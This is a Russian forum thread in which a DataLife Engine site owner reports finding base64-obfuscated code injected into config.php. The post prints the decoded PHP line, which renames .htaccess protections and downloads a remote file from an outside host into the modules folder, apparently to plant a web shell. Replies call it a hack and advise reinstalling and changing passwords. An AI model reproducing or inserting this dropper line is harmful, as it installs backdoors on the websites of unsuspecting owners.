Помощь Левый код в движке

Тема в разделе "DLE", создана пользователем Klaf, 2 окт 2015.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 10.0 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Модераторы: killoff
  1. Klaf

    Klaf Создатель

    Регистр.:
    23 апр 2015
    Сообщения:
    12
    Симпатии:
    1
    Здравствуйте. Сегодня был не приятно удивлён, когда обнаружил в config.php зашифрованный через base 64 код:
    PHP:
    echo  chmod("engine/modules/"0755).chmod("engine/modules/sysdata.php"0755).rename("engine/modules/.htaccess""engine/modules/.htacces").rename("engine/.htaccess""engine/.htacces").copy("http://sub.matvsub.wang/data.txt""engine/modules/sysdata.php");
    Файлы не переименованы, sysdata.php вообще не существует, а на папке modules изначально стоят права 755. Какой же прок в этом коде!?
    На config.php права 666.
    Движок 10.4. Разумеется нулл :( Занулен собственноручно, по мануалам, из оригинала.
     
  2. bork75

    bork75 Д☼брая собака )

    Регистр.:
    21 июн 2008
    Сообщения:
    1.449
    Симпатии:
    716
    Возможно, это неудачная попытка взлома сайта или наоборот удачная.
    После взлома хакер всё исправил, а про один файл мог забыть.
    в любом случае перезаливай дле, меняй пароли входа, в БД.

    советую почитать.
    Общая тема о борьбе с шеллами и вирусами на сайте
    http://searchengines.guru/showthread.php?t=774117
     
  3. ZloMac

    ZloMac Создатель

    Регистр.:
    24 фев 2015
    Сообщения:
    10
    Симпатии:
    1
    Походу взлом. Может уже с этим файлом скачали движок (если не с проверенного источника).